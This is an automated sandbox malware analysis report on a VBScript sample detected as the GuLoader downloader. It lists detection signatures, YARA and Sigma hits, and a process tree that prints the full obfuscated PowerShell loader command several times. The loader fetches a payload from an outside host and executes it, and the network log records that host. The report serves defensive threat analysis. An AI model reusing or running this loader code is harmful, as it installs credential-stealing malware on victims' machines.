Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
O1CZjzItH1.vbs

Overview

General Information

Sample name:O1CZjzItH1.vbs
renamed because original name is a hash value
Original sample name:adac32cc529c6b0b0bde007d733e51eb9b1c5de5df85e97680f954158bb90959.vbs
Analysis ID:1540050
MD5:250e1218609ed0d1e84e24290a5c3759
SHA1:cb11233eb647f9731ae643d959fa3f40a483f3aa
SHA256:adac32cc529c6b0b0bde007d733e51eb9b1c5de5df85e97680f954158bb90959
Tags:D3LabSnakeKeyLoggerSPAM-ITAvbsuser-JAMESWT_MHT
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Potential evasive VBS script found (sleep loop)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses ping.exe to check the status of other devices and networks
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 1248 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\O1CZjzItH1.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • PING.EXE (PID: 4324 cmdline: ping gormezl_6777.6777.6777.677e MD5: 2F46799D79D22AC72C241EC0322B011D)
      • conhost.exe (PID: 2228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3136 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Stelography Boligministerielt Surterhvervet Polenkas #>;$Genforeningerne='Brasilianske';<#Decoloriser Quatrains dksmands Rentabelt #>;$Stvregne=$Orlos+$host.UI; function Udgangstilladelsernes($Lupulus){If ($Stvregne) {$setaria++;}$Revest=$Velkomstens74+$Lupulus.'Length'-$setaria; for( $Kropsvisiteret=4;$Kropsvisiteret -lt $Revest;$Kropsvisiteret+=5){$Spoilage=$Kropsvisiteret;$Salvelsesfuldest+=$Lupulus[$Kropsvisiteret];$Prototraitor='Kronvildtjagterne';}$Salvelsesfuldest;}function Skilleliniens($Knothead){ & ($Toilettaskens) ($Knothead);}$Tastetryk=Udgangstilladelsernes 'guttM ndsoUn uzPoliiCanal I clvotaaDavi/ Pen ';$Tastetryk+=Udgangstilladelsernes 'Quar5Skyd.mine0Love Ski.(Li nWFejliMul nFabrdudklo NanwF.ans a,a ProcNB,geT,lie Stem1Udru0 Dr,.Roug0Raci;Phra OffiWCensiRiddnNatu6Oakl4Be i;Ne.r FenaxOver6Ea t4Ur n;Nume UrinrGyptvFili:sta,1 Eff3Dest1Clee.Disa0Tred)Fi a HandG noneYellcJustk Siso,rep/Frod2 Sto0H.ms1Stil0Gest0 P.o1Cert0Wi t1Buri DyreFSelviDubbr G,ueH,mpf tr oUmorxL,du/Defl1conv3Post1N ws.Sikk0 Bog ';$Cellerne=Udgangstilladelsernes 'EmbrUO bys OppeQuarrErog-surfA ukkgBro E ivsN fortigna ';$Konstruktivt=Udgangstilladelsernes 'Gru.haf,at ArttB depKachsHoo,:Flit/Be.a/ GamsBatiyH lvnDeuteMa ipFinu.Fl trTohaoBef./SkosLQuacySpecsActib trgaSandd vov. PaupStr sS,anpSkij ';$Kropsvisiteretndarbejde97=Udgangstilladelsernes 'Olde>Gang ';$Toilettaskens=Udgangstilladelsernes ' ympI .ree Sa.x Raf ';$Lykkejgers='Spendynr';$Proconscriptive='\Udviklingsegnes.sep';Skilleliniens (Udgangstilladelsernes ' npa$Fuyeg Cu le,acoNaivbFinaAAkvaLTr,n:O.lltCytoAIdeamFra B Ud UUn,rRChicSBlse=Ozon$ kreSkanNP lwvGlas: staA St PWordP La D AliASn.wt P.laU,fr+trau$frynpGnisr ,enoAppecDuelO.enenKgeusF.rhC r nrOarliclump FleTswo iLym.vRefeETysk ');Skilleliniens (Udgangstilladelsernes 'Arbe$Forbg PenlHandoMinuBFackaLa sL Bil: UnmKgardOIndod eneELan k aresA skEK.ogrOml.=Bajo$Kl pknarcoCraiNSy gSChert PrerUnusUPr.lKPrint s aI ealvsammTAkti.AnidsChe,pThyml N nIOpe.TTrun(Hoo $svinkUn.orChecO no pTilfS F,rVSvinifadeS .ryiBeriTStroeAntiR .elEnoncTskifN FerDForpa.ildRGipsBSan eDampj ForDMelaEJor 9Disi7Insi)Star ');Skilleliniens (Udgangstilladelsernes ' Nov[,ufonfjldE RovtEjen.SextshunkE Marr Genv .kki C,nCDi heBronP,kspoGadiIFrowNtndit,algMInf AEkspNVeneABallg UngeFastr Gre]Wa.r:U,co: molSApplE KogC ,unuAnteRReaniDm,iT CarYKrafp E.er nheoGardtLauroTahacCivioNighLLump Rang=Outb ,usk[ StaN A.hE Ovet Wif.GcelSFormeBondc,andUS ilRArtoI ukkTToroYParoPdolorSubpOPreitcheeoFrieCSrskOLserl OddTunfoYD ospSkypeEksp]Sg f: amm:Dry,tPomeLaddos nab1Dila2 le ');$Konstruktivt=$Kodekser[0];$Slbemaalsflyvningens=(Udgangstilladelsernes 'Buat$,utwgVineLLs lO ,aaBMuriaGravLT.ia:up om TusEDrabsNondOPoluSDat.TRoofeSperTGarrHVir,i racuEmpimBol,= OstNAndre K sW Da -S orODefebNonpj phEFedeC N dTpara BadeSPermYLmleS enotfiltEPretmHj i. F rnWin eMar.T Rec. llewPosteAgnobKarmcudtolPl ai eae ,ldNAf,itHype ');Skilleliniens ($Slbemaalsflyvningens);Skilleliniens (Udgangstilladelsernes 'Indb$UntoMInhueSlags AfvoN das clatCh.pe Glut Indh lloi AkkuIn emIntr.TrolHGrateLeukaNvn,d aadeFjolrKnurs,oti[ els$Rep,C rane,alelForklErg eSvejrSrgenHyp eStam]Nico=Br s$PligTUdr aHvedsJ.rdtMaadeor rtConcrUnafyT iwkHenr ');$Egidias=Udgangstilladelsernes 'Fjer$ WheMSynteJo vsInosoZinasReast SyseCap.t Fdeh Rrei.nteuCocimcolo.Hun.DVocio endw entnOystlHelhoKommaskged atrFExaniOrphlJinge Po,(Acli$SnreK S roLoitnPernsBe,zt DisrSputuEddikEbb,tPolli HjevLuftt,kit, omb$ PleS TreuMisbbDrukcFallaGe,en FoodHen iKaradId.nl M syRaba)Kom ';$Subcandidly=$Tamburs;Skilleliniens (Udgangstilladelsernes 'Si s$GlobGVintL ecooParaB SelAS.enlHalv: FrucI oleRampME,asBBib aPhloLTossoWaxeeD gfTL anSFibr=Unfi(TidstIdeaeRevns asktLev -Gar P ,ida.dreTUrolH da Semi$PinsSKlupuElecBRur.cInteaSam n ndsdsl mIAkusD ,hol emiYTele)I fa ');while (!$Cembaloets) {Skilleliniens (Udgangstilladelsernes ' Jua$ H pgStralWitooC.rkbK,lvaPesslFo d:PrinSvi etTilboTaabcIntekVejpaO sld Re,iVir n.issg Und= A,t$SylttflokrOut uRi,eeCoul ') ;Skilleliniens $Egidias;Skilleliniens (Udgangstilladelsernes 'Bryas ocTRefeAJourRunmatApp,-SecuSSubllPoi EPreeEMonkPRenn A ge4Chia ');Skilleliniens (Udgangstilladelsernes 'Noni$a nuGU deLK,ttOhjfrbJar,A .reLRaad:kersCNjereRab MPre bStarARentlFailoRevaE D,gTAfviSthra=T an(Sigtt.iscE Ha S.ubwt Mo,-T mipSta,AUganTEntrhUnfo Sm $SvmmSBibeu GrnB crCHi tAPr cn jasdU.coiSimeDSkriLpappY ild)Nulp ') ;Skilleliniens (Udgangstilladelsernes 'Twan$HovegAstrlBiblohjreBUdl.AHallL agk:ServT geoMng,X CalI S oFbur YSulp2Euka2plun1 tra=Fje $FragGUnziLOveroFittBLagea Nv l A,f: enN M riMycotSe.spIndkiOndsCHa.hkKno.EEn idEmbi+Skin+Sa l%Inds$SphikBsnioSciadTincEUn iKBespSTjrpeE,isrCoif.AdmiC enloRa.kuIvaonPensTLide ') ;$Konstruktivt=$Kodekser[$Toxify221];}$Solidare=303621;$Polyadelph=30134;Skilleliniens (Udgangstilladelsernes 'Twa,$Di.gGStreLbyraoblombbr dASk,dLSalg:ListrFdebe aprgunvinHypoSAn,lk PusaCalibHjersBesgppejkRTun iCaconKartCV ctI perPstanp BenEUnflRRhinsPalm E t=Genn dieGIndrER ftTAb f-D scCLgeroJok NLor T ,edE OvenPartTAnon Pas$TnkesSkabU o,ebO,erc utoaBillN R vDNeigiServD Erll U.vyLuti ');Skilleliniens (Udgangstilladelsernes 'Malk$HavngPrislTessoPelvb IsoaHydrlOrdm:.teePlo ieAwaraSkifcFilsh blilFlasiM nikMacre Smi Lo,e=E jo Detr[Frg SFlngyRespsEnertUmbieE lym on.Se rCClamoDiscn L,avHu teHunkr PertAcco] ,ve:In,e:SproF uborSkyjo,ohemI agBRaadaSynasBroeeForl6Lage4Con SK ngt Kl r KamiCampnPlagg Pa (reol$EkspRLorieOutcg IgnnFo ksReagkKrimaOd nbParasAdreplnrerNonciGrannF.rac Heri arlpWindpTreveSen rNybysDyst)Pana ');Skilleliniens (Udgangstilladelsernes 'Sana$parcGStedLRevlOLgeub B aa AfkL Ket:F akTCarbIT anlLives isckUdvlRmycee.andRspris Bl ABlo.k ApiS Vole unnpy.rE UniSDoms7Angl7Unde nonc= Fru Pedu[MortS NriYInv SRaveTTin.EHun mBead.AmenTBecheE ogxJudet Gha. ExaEEp,xN sweCSoldOAbenDFlodiDyrtNUni.GIndd]S ep:Myos:NonhA B lSSistCDesaIToniI,ale. Bl G HelE MamtSynesSha.t,ovgR Ty.i StenRin gUnsy(Htbl$MeatPHeteeMet ADer CUsarhEmb L Thoi rioKHldne Ind) Tri ');Skilleliniens (Udgangstilladelsernes 'Squi$TaxiGUdd lKommoEntrBOperAKasklParf:Jun u ornMinuT imiUE emFK ostBandeBuredMe.a= la$ BefTFastIRewaLsyndsPillkMashrAmt eTi.frHavesSpeaA T ikOverSHv,dEKritnRo kE fssSe,i7Dech7Caus.N,nnsDan UFiskB KotsRg ot ndRultriUbalN.araG Whi( al$ HagsUdtrointelUgesi TrsDUndeaTranrbl ee Phe, Bur$Ark.pPit OQu flIndkY Palalownd .uoeM sslKastPB seHOp r)Sup. ');Skilleliniens $Untufted;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 3228 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Stelography Boligministerielt Surterhvervet Polenkas #>;$Genforeningerne='Brasilianske';<#Decoloriser Quatrains dksmands Rentabelt #>;$Stvregne=$Orlos+$host.UI; function Udgangstilladelsernes($Lupulus){If ($Stvregne) {$setaria++;}$Revest=$Velkomstens74+$Lupulus.'Length'-$setaria; for( $Kropsvisiteret=4;$Kropsvisiteret -lt $Revest;$Kropsvisiteret+=5){$Spoilage=$Kropsvisiteret;$Salvelsesfuldest+=$Lupulus[$Kropsvisiteret];$Prototraitor='Kronvildtjagterne';}$Salvelsesfuldest;}function Skilleliniens($Knothead){ & ($Toilettaskens) ($Knothead);}$Tastetryk=Udgangstilladelsernes 'guttM ndsoUn uzPoliiCanal I clvotaaDavi/ Pen ';$Tastetryk+=Udgangstilladelsernes 'Quar5Skyd.mine0Love Ski.(Li nWFejliMul nFabrdudklo NanwF.ans a,a ProcNB,geT,lie Stem1Udru0 Dr,.Roug0Raci;Phra OffiWCensiRiddnNatu6Oakl4Be i;Ne.r FenaxOver6Ea t4Ur n;Nume UrinrGyptvFili:sta,1 Eff3Dest1Clee.Disa0Tred)Fi a HandG noneYellcJustk Siso,rep/Frod2 Sto0H.ms1Stil0Gest0 P.o1Cert0Wi t1Buri DyreFSelviDubbr G,ueH,mpf tr oUmorxL,du/Defl1conv3Post1N ws.Sikk0 Bog ';$Cellerne=Udgangstilladelsernes 'EmbrUO bys OppeQuarrErog-surfA ukkgBro E ivsN fortigna ';$Konstruktivt=Udgangstilladelsernes 'Gru.haf,at ArttB depKachsHoo,:Flit/Be.a/ GamsBatiyH lvnDeuteMa ipFinu.Fl trTohaoBef./SkosLQuacySpecsActib trgaSandd vov. PaupStr sS,anpSkij ';$Kropsvisiteretndarbejde97=Udgangstilladelsernes 'Olde>Gang ';$Toilettaskens=Udgangstilladelsernes ' ympI .ree Sa.x Raf ';$Lykkejgers='Spendynr';$Proconscriptive='\Udviklingsegnes.sep';Skilleliniens (Udgangstilladelsernes ' npa$Fuyeg Cu le,acoNaivbFinaAAkvaLTr,n:O.lltCytoAIdeamFra B Ud UUn,rRChicSBlse=Ozon$ kreSkanNP lwvGlas: staA St PWordP La D AliASn.wt P.laU,fr+trau$frynpGnisr ,enoAppecDuelO.enenKgeusF.rhC r nrOarliclump FleTswo iLym.vRefeETysk ');Skilleliniens (Udgangstilladelsernes 'Arbe$Forbg PenlHandoMinuBFackaLa sL Bil: UnmKgardOIndod eneELan k aresA skEK.ogrOml.=Bajo$Kl pknarcoCraiNSy gSChert PrerUnusUPr.lKPrint s aI ealvsammTAkti.AnidsChe,pThyml N nIOpe.TTrun(Hoo $svinkUn.orChecO no pTilfS F,rVSvinifadeS .ryiBeriTStroeAntiR .elEnoncTskifN FerDForpa.ildRGipsBSan eDampj ForDMelaEJor 9Disi7Insi)Star ');Skilleliniens (Udgangstilladelsernes ' Nov[,ufonfjldE RovtEjen.SextshunkE Marr Genv .kki C,nCDi heBronP,kspoGadiIFrowNtndit,algMInf AEkspNVeneABallg UngeFastr Gre]Wa.r:U,co: molSApplE KogC ,unuAnteRReaniDm,iT CarYKrafp E.er nheoGardtLauroTahacCivioNighLLump Rang=Outb ,usk[ StaN A.hE Ovet Wif.GcelSFormeBondc,andUS ilRArtoI ukkTToroYParoPdolorSubpOPreitcheeoFrieCSrskOLserl OddTunfoYD ospSkypeEksp]Sg f: amm:Dry,tPomeLaddos nab1Dila2 le ');$Konstruktivt=$Kodekser[0];$Slbemaalsflyvningens=(Udgangstilladelsernes 'Buat$,utwgVineLLs lO ,aaBMuriaGravLT.ia:up om TusEDrabsNondOPoluSDat.TRoofeSperTGarrHVir,i racuEmpimBol,= OstNAndre K sW Da -S orODefebNonpj phEFedeC N dTpara BadeSPermYLmleS enotfiltEPretmHj i. F rnWin eMar.T Rec. llewPosteAgnobKarmcudtolPl ai eae ,ldNAf,itHype ');Skilleliniens ($Slbemaalsflyvningens);Skilleliniens (Udgangstilladelsernes 'Indb$UntoMInhueSlags AfvoN das clatCh.pe Glut Indh lloi AkkuIn emIntr.TrolHGrateLeukaNvn,d aadeFjolrKnurs,oti[ els$Rep,C rane,alelForklErg eSvejrSrgenHyp eStam]Nico=Br s$PligTUdr aHvedsJ.rdtMaadeor rtConcrUnafyT iwkHenr ');$Egidias=Udgangstilladelsernes 'Fjer$ WheMSynteJo vsInosoZinasReast SyseCap.t Fdeh Rrei.nteuCocimcolo.Hun.DVocio endw entnOystlHelhoKommaskged atrFExaniOrphlJinge Po,(Acli$SnreK S roLoitnPernsBe,zt DisrSputuEddikEbb,tPolli HjevLuftt,kit, omb$ PleS TreuMisbbDrukcFallaGe,en FoodHen iKaradId.nl M syRaba)Kom ';$Subcandidly=$Tamburs;Skilleliniens (Udgangstilladelsernes 'Si s$GlobGVintL ecooParaB SelAS.enlHalv: FrucI oleRampME,asBBib aPhloLTossoWaxeeD gfTL anSFibr=Unfi(TidstIdeaeRevns asktLev -Gar P ,ida.dreTUrolH da Semi$PinsSKlupuElecBRur.cInteaSam n ndsdsl mIAkusD ,hol emiYTele)I fa ');while (!$Cembaloets) {Skilleliniens (Udgangstilladelsernes ' Jua$ H pgStralWitooC.rkbK,lvaPesslFo d:PrinSvi etTilboTaabcIntekVejpaO sld Re,iVir n.issg Und= A,t$SylttflokrOut uRi,eeCoul ') ;Skilleliniens $Egidias;Skilleliniens (Udgangstilladelsernes 'Bryas ocTRefeAJourRunmatApp,-SecuSSubllPoi EPreeEMonkPRenn A ge4Chia ');Skilleliniens (Udgangstilladelsernes 'Noni$a nuGU deLK,ttOhjfrbJar,A .reLRaad:kersCNjereRab MPre bStarARentlFailoRevaE D,gTAfviSthra=T an(Sigtt.iscE Ha S.ubwt Mo,-T mipSta,AUganTEntrhUnfo Sm $SvmmSBibeu GrnB crCHi tAPr cn jasdU.coiSimeDSkriLpappY ild)Nulp ') ;Skilleliniens (Udgangstilladelsernes 'Twan$HovegAstrlBiblohjreBUdl.AHallL agk:ServT geoMng,X CalI S oFbur YSulp2Euka2plun1 tra=Fje $FragGUnziLOveroFittBLagea Nv l A,f: enN M riMycotSe.spIndkiOndsCHa.hkKno.EEn idEmbi+Skin+Sa l%Inds$SphikBsnioSciadTincEUn iKBespSTjrpeE,isrCoif.AdmiC enloRa.kuIvaonPensTLide ') ;$Konstruktivt=$Kodekser[$Toxify221];}$Solidare=303621;$Polyadelph=30134;Skilleliniens (Udgangstilladelsernes 'Twa,$Di.gGStreLbyraoblombbr dASk,dLSalg:ListrFdebe aprgunvinHypoSAn,lk PusaCalibHjersBesgppejkRTun iCaconKartCV ctI perPstanp BenEUnflRRhinsPalm E t=Genn dieGIndrER ftTAb f-D scCLgeroJok NLor T ,edE OvenPartTAnon Pas$TnkesSkabU o,ebO,erc utoaBillN R vDNeigiServD Erll U.vyLuti ');Skilleliniens (Udgangstilladelsernes 'Malk$HavngPrislTessoPelvb IsoaHydrlOrdm:.teePlo ieAwaraSkifcFilsh blilFlasiM nikMacre Smi Lo,e=E jo Detr[Frg SFlngyRespsEnertUmbieE lym on.Se rCClamoDiscn L,avHu teHunkr PertAcco] ,ve:In,e:SproF uborSkyjo,ohemI agBRaadaSynasBroeeForl6Lage4Con SK ngt Kl r KamiCampnPlagg Pa (reol$EkspRLorieOutcg IgnnFo ksReagkKrimaOd nbParasAdreplnrerNonciGrannF.rac Heri arlpWindpTreveSen rNybysDyst)Pana ');Skilleliniens (Udgangstilladelsernes 'Sana$parcGStedLRevlOLgeub B aa AfkL Ket:F akTCarbIT anlLives isckUdvlRmycee.andRspris Bl ABlo.k ApiS Vole unnpy.rE UniSDoms7Angl7Unde nonc= Fru Pedu[MortS NriYInv SRaveTTin.EHun mBead.AmenTBecheE ogxJudet Gha. ExaEEp,xN sweCSoldOAbenDFlodiDyrtNUni.GIndd]S ep:Myos:NonhA B lSSistCDesaIToniI,ale. Bl G HelE MamtSynesSha.t,ovgR Ty.i StenRin gUnsy(Htbl$MeatPHeteeMet ADer CUsarhEmb L Thoi rioKHldne Ind) Tri ');Skilleliniens (Udgangstilladelsernes 'Squi$TaxiGUdd lKommoEntrBOperAKasklParf:Jun u ornMinuT imiUE emFK ostBandeBuredMe.a= la$ BefTFastIRewaLsyndsPillkMashrAmt eTi.frHavesSpeaA T ikOverSHv,dEKritnRo kE fssSe,i7Dech7Caus.N,nnsDan UFiskB KotsRg ot ndRultriUbalN.araG Whi( al$ HagsUdtrointelUgesi TrsDUndeaTranrbl ee Phe, Bur$Ark.pPit OQu flIndkY Palalownd .uoeM sslKastPB seHOp r)Sup. ');Skilleliniens $Untufted;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 6380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.3353773662.00000000084D0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    00000006.00000002.3353948398.000000000C936000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      00000006.00000002.3340409959.0000000005886000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
        00000004.00000002.2187936200.0000028025C7E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
          Process Memory Space: powershell.exe PID: 3136JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Click to see the 3 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_3136.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi32_3228.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xc567:$b2: ::FromBase64String(
              • 0xb5ce:$s1: -join
              • 0x4d7a:$s4: +=
              • 0x4e3c:$s4: +=
              • 0x9063:$s4: +=
              • 0xb180:$s4: +=
              • 0xb46a:$s4: +=
              • 0xb5b0:$s4: +=
              • 0x154af:$s4: +=
              • 0x1552f:$s4: +=
              • 0x155f5:$s4: +=
              • 0x15675:$s4: +=
              • 0x1584b:$s4: +=
              • 0x158cf:$s4: +=
              • 0xbe03:$e4: Get-WmiObject
              • 0xbff2:$e4: Get-Process
              • 0xc04a:$e4: Start-Process
              • 0x1613f:$e4: Get-Process

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\O1CZjzItH1.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\O1CZjzItH1.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\O1CZjzItH1.vbs", ProcessId: 1248, ProcessName: wscript.exe
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\O1CZjzItH1.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\O1CZjzItH1.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\O1CZjzItH1.vbs", ProcessId: 1248, ProcessName: wscript.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Stelography Boligministerielt Surterhvervet Polenkas #>;$Genforeningerne='Brasilianske';<#Decoloriser Quatrains dksmands Rentabelt #>;$Stvregne=$Orlos+$host.UI; function Udgangstilladelsernes($Lupulus){If ($Stvregne) {$setaria++;}$Revest=$Velkomstens74+$Lupulus.'Length'-$setaria; for( $Kropsvisiteret=4;$Kropsvisiteret -lt $Revest;$Kropsvisiteret+=5){$Spoilage=$Kropsvisiteret;$Salvelsesfuldest+=$Lupulus[$Kropsvisiteret];$Prototraitor='Kronvildtjagterne';}$Salvelsesfuldest;}function Skilleliniens($Knothead){ & ($Toilettaskens) ($Knothead);}$Tastetryk=Udgangstilladelsernes 'guttM ndsoUn uzPoliiCanal I clvotaaDavi/ Pen ';$Tastetryk+=Udgangstilladelsernes 'Quar5Skyd.mine0Love Ski.(Li nWFejliMul nFabrdudklo NanwF.ans a,a ProcNB,geT,lie Stem1Udru0 Dr,.Roug0Raci;Phra OffiWCensiRiddnNatu6Oakl4Be i;Ne.r FenaxOver6Ea t4Ur n;Nume UrinrGyptvFili:sta,1 Eff3Dest1Clee.Disa0Tred)Fi a HandG noneYellcJustk Siso,rep/Frod2 Sto0H.ms1Stil0Gest0 P.o1Cert0Wi t1Buri DyreFSelviDubbr G,ueH,mpf tr oUmorxL,du/Defl1conv3Post1N ws.Sikk0 Bog ';$Cellerne=Udgangstilladelsernes 'EmbrUO bys OppeQuarrErog-surfA ukkgBro E ivsN fortigna ';$Konstruktivt=Udgangstilladelsernes 'Gru.haf,at ArttB depKachsHoo,:Flit/Be.a/ GamsBatiyH lvnDeuteMa ipFinu.Fl trTohaoBef./SkosLQuacySpecsActib trgaSandd vov. PaupStr sS,anpSkij ';$Kropsvisiteretndarbejde97=Udgangstilladelsernes 'Olde>Gang ';$Toilettaskens=Udgangstilladelsernes ' ympI .ree Sa.x Raf ';$Lykkejgers='Spendynr';$Proconscriptive='\Udviklingsegnes.sep';Skilleliniens (Udgangstilladelsernes ' npa$Fuyeg Cu le,acoNaivbFinaAAkvaLTr,n:O.lltCytoAIdeamFra B Ud UUn,rRChicSBlse=Ozon$ kreSkanNP lwvGlas: staA St PWordP La D AliASn.wt P.laU,fr+trau$frynpGnisr ,enoAppecDuelO.enenKgeusF.rhC r nrOarliclump FleTswo iLym.vRefeETysk ');Skilleliniens (Udgangstilladelsernes 'Arbe$Forbg PenlHandoMinuBFackaLa sL Bil: UnmKgardOIndod eneELan k aresA skEK.ogrOml.=Bajo$Kl pknarcoCraiNSy gSChert PrerUnusUPr.lKPrint s aI ealvsammTAkti.AnidsChe,pThyml N nIOpe.TTrun(Hoo $svinkUn.orChecO no pTilfS F,rVSvinifadeS .ryiBeriTStroeAntiR .elEnoncTskifN FerDForpa.ildRGipsBSan eDampj ForDMelaEJor 9Disi7Insi)Star ');Skilleliniens (Udgangstilladelsernes ' Nov[,ufonfjldE RovtEjen.SextshunkE Marr Genv .kki C,nCDi heBronP,kspoGadiIFrowNtndit,algMInf AEkspNVeneABallg UngeFastr Gre]Wa.r:U,co: molSApplE KogC ,unuAnteRReaniDm,iT CarYKrafp E.er nheoGardtLauroTahacCivioNighLLump Rang=Outb ,usk[ StaN A.hE Ovet Wif.GcelSFormeBondc,andUS ilRArtoI ukkTToroYParoPdolorSubpOPreitcheeoFrieCSrskOLserl OddTunfoYD ospSkypeEksp]Sg f: amm:Dry,tPomeLaddos nab1Dila2 le ');$Konstruktivt=$Kodekser[0];$Slbemaalsflyvningens=(Udgangstilladelsernes 'Buat$,utwgVineLLs lO ,aaBMuriaGravLT.ia:up om TusEDrabsNondOPoluSDat.TRoofeSperTGarrHVir,i racuEmpimBol,= OstNAndre K sW Da -S orODefebNonpj phEFedeC N dTpara BadeSPermYLmleS enotfiltEPretmHj i. F rnWin eMar.T Rec. llewPosteAgnobKarmcudtolPl ai eae ,ldNAf,itHype ');Skilleliniens ($Slbe

              Suricata Signatures

              No Suricata rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Multi AV Scanner detection for submitted file
              Source: O1CZjzItH1.vbsReversingLabs: Detection: 28%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.5% probability
              Source: unknownHTTPS traffic detected: 31.14.12.249:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: Binary string: aqm.Core.pdbZ source: powershell.exe, 00000006.00000002.3346493152.0000000007103000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.3346493152.0000000007030000.00000004.00000020.00020000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Suspicious execution chain found
              Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

              Networking

              barindex
              Uses ping.exe to check the status of other devices and networks
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\PING.EXE ping gormezl_6777.6777.6777.677e
              Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: global trafficHTTP traffic detected: GET /Lysbad.psp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: synep.roConnection: Keep-Alive
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
